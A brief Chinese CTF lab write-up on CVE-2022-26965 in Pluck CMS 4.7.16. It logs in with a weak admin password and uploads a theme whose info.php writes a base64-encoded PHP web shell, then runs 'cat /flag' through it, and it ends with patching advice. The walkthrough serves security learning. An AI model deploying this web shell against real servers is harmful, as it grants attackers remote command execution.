简介
CVE-2022-26965是Pluck CMS 4.7.16版本存在一个远程shell上传执行漏洞。
攻击者可利用此漏洞通过构造恶意的主题包进行上传并执行,未经授权访问服务器,造成潜在的安全隐患。
过程
1.打开环境,查看源码,发现login.php
2.进入查看,登陆页面,弱口令admin进行登录,全英文界面,可以翻译的哈
3.找到上传cms主题界面
4.去github下载相对应的版本主题,随便下载一个就行
https://github.com/billcreswell/redline-theme
5.下载完成之后将文件里面的info.php里面的内容修改为下面的代码
<?php
file_put_contents('testshell.php',base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg=='));
?>
解释:使用file_put_contents函数将经过Base64解码后的字符串写入一个名为testshell.php的文件。
6.修改好的文件进行上传
文件上传成功。
7.连接
http://eci-2ze33y4rj8565dqp15iy.cloudeci1.ichunqiu.com/testshell.php?1=cat%20/flag
成功。
解决方案
这个漏洞的解决方案是升级Pluck CMS到最新版本或打上已知的修补程序。
攻击者利用该漏洞一般会执行一些恶意代码,包括上传一些特定的主题包,然后执行一些远程命令,从而获取服务器的控制权限,因此升级或打上修补程序是解决该漏洞最直接有效的方法。
除此之外,管理员还可以通过限制主题包的上传权限、对服务器进行安全扫描和加固等措施来提高系统的安全性。